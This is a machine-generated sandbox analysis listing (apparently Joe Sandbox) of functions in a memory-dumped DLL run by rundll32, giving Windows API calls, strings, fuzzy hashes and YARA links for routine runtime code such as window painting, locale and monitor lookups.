Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001DFC0, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 1001DFE3

Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299

SendMessageA.USER32 ref: 1001E031
GetSystemMetrics.USER32 ref: 1001E039
GetSystemMetrics.USER32 ref: 1001E044
GetClientRect.USER32 ref: 1001E05B
DrawIcon.USER32 ref: 1001E0AE

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
Instruction ID: 44eb2ef316f0b933980e992ec3fa30d6a4f6e9fba2b57c8abd37e2d05c6bd9c1
Opcode Fuzzy Hash: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
Instruction Fuzzy Hash: 4A31EA75A00119DFDB24CFA8C985FAEBBB5FB48300F108299E549E7241DA30AE84DF54

Uniqueness

Uniqueness Score: -1.00%

Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 100212CD

Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
__snwprintf_s.LIBCMT ref: 1002131A
LoadLibraryA.KERNEL32(?), ref: 10021355

Strings

LOC, xrefs: 100212C5

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1016519223-519433814
Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 10031D3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
TerminateProcess.KERNEL32(00000000), ref: 10031D7D

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 10024F01, Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10024F24
GetVersionExA.KERNEL32(?), ref: 10024F3D

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
Instruction ID: 60a6db508766d0176de5257cd9c04f851b8e12d18597fbeb5363c1cc45f9d795
Opcode Fuzzy Hash: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
Instruction Fuzzy Hash: 54F065799002189FEB50DB74DD46B8E77F8AB04304F9144E5950DD3282EA70AA48CB41

Uniqueness

Uniqueness Score: -1.00%

Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100214D5
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
ConvertDefaultLocale.KERNEL32(?), ref: 10021555
ConvertDefaultLocale.KERNEL32(?), ref: 10021563
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
EnumResourceLanguagesA.KERNEL32 ref: 100215EA
ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
_memset.LIBCMT ref: 10021689

Strings

kernel32.dll, xrefs: 100214EE
GetUserDefaultUILanguage, xrefs: 1002150D
GetSystemDefaultUILanguage, xrefs: 10021565
ntdll.dll, xrefs: 100215C8

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10024F5B, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10024FA2
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10024FB3
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10024FC4
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10024FD5
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10024FE6
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10024FF7
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10025008

Strings

GetSystemMetrics, xrefs: 10024F9C
EnumDisplayDevicesA, xrefs: 10025002
EnumDisplayMonitors, xrefs: 10024FE0
MonitorFromPoint, xrefs: 10024FCF
USER32, xrefs: 10024F7C
MonitorFromWindow, xrefs: 10024FAD
GetMonitorInfoA, xrefs: 10024FF1
MonitorFromRect, xrefs: 10024FBE

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98

Uniqueness

Uniqueness Score: -1.00%

Function 10026EFC, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetParent.USER32(?), ref: 10026F2B
SendMessageA.USER32 ref: 10026F4E
GetWindowRect.USER32 ref: 10026F68
GetWindowLongA.USER32 ref: 10026F7E
CopyRect.USER32 ref: 10026FCB
CopyRect.USER32 ref: 10026FD5
GetWindowRect.USER32 ref: 10026FDE
CopyRect.USER32 ref: 10026FFA

Strings

(, xrefs: 10026F94

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64

Uniqueness

Uniqueness Score: -1.00%

Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
__crt_waiting_on_module_handle.LIBCMT ref: 1003462D

Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
__lock.LIBCMT ref: 10034688
InterlockedIncrement.KERNEL32(?), ref: 10034695
__lock.LIBCMT ref: 100346A9
___addlocaleref.LIBCMT ref: 100346C7

Strings

EncodePointer, xrefs: 1003464A
KERNEL32.DLL, xrefs: 1003461C, 10034621, 1003462C
DecodePointer, xrefs: 1003465E

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC

Strings

CreateActCtxA, xrefs: 10020C7F
KERNEL32, xrefs: 10020C63
DeactivateActCtx, xrefs: 10020CA1
ReleaseActCtx, xrefs: 10020C87
ActivateActCtx, xrefs: 10020C94

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17

Uniqueness

Uniqueness Score: -1.00%

Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10023423
FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
LoadResource.KERNEL32(?,00000000), ref: 1002345E

Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C

LockResource.KERNEL32(?,00000024,1000150C,00000000,EDE0AFBE), ref: 1002346F
GetDesktopWindow.USER32 ref: 100234A2
IsWindowEnabled.USER32(?), ref: 100234B0
EnableWindow.USER32(?,00000000), ref: 100234BF

Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,EDE0AFBE), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,EDE0AFBE), ref: 100235D9

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 1002B9C8
GetStockObject.GDI32(0000000D), ref: 1002B9D0
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
GetDC.USER32(00000000), ref: 1002B9EC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
ReleaseDC.USER32 ref: 1002BA18

Strings

System, xrefs: 1002B9C3, 1002BA2D

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E7D5
SendMessageA.USER32 ref: 1001E7FB
SendMessageA.USER32 ref: 1001E815
SendMessageA.USER32 ref: 1001E839
SendMessageA.USER32 ref: 1001E86E
SendMessageA.USER32 ref: 1001E888
SendMessageA.USER32 ref: 1001E8A4
SendMessageA.USER32 ref: 1001E8BD
SendMessageA.USER32 ref: 1001E8DB

Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002AF6B, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AF72
EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10001982

Strings

ios_base::eofbit set, xrefs: 10001A88
ios_base::failbit set, xrefs: 10001A1E
ios_base::badbit set, xrefs: 100019A3

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
